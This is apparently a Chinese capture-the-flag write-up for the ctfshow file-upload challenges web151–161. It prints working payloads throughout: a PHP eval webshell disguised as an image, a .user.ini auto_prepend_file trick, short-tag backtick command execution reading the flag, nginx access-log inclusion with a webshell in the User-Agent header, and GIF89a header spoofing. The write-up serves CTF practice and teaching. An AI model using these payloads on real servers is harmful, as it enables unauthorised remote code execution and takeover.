本文共 809 字，大约阅读时间需要 2 分钟。

web151-152

hint是前台验证，那么直接先上传.png后缀的图片马，在burp中将.png改为.php即可，然后蚁剑连接拿到flag

web153

这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因，在访问时只能把他们下载下来，因为这里是nginx，所以试了上传.user.ini，发现可行

我们指定一个文件（如a.jpg），那么该文件就会被包含在要执行的php文件中（如index.php），类似于在index.php中插入一句：require(./a.jpg);

先上传一个.user.ini文件，

GIF89aauto_prepend_file=1.png

再上传1.png

#define width 1337#define height 1337 <?php @eval($_POST[a]);?>

然后访问url/upload/index.php，flag在上一级目录的flag.php中

web154-159

这题需要修改一句话木马，改成

#define width 1337#define height 1337 <?=`tac ../f*`;?>

这里可以使用短标签，php会将``中的内容当作代码去执行。
在web157后，需要将最后的;删去

#define width 1337#define height 1337 <?=`tac ../f*`?>

web160

我初步的测试了下，过滤了空格 | ( | [ | { | ` |，那么这题可以选择日志包含。
先上传.user.ini和图片，图片的内容是<?=include"/var/lo"."g/nginx/access.lo"."g"?>，然后在访问url时修改ua头为一句话木马即可

web161

在上一题的基础上，增加了对图片头的检测，在图片和.user.ini前面加上GIF89a即可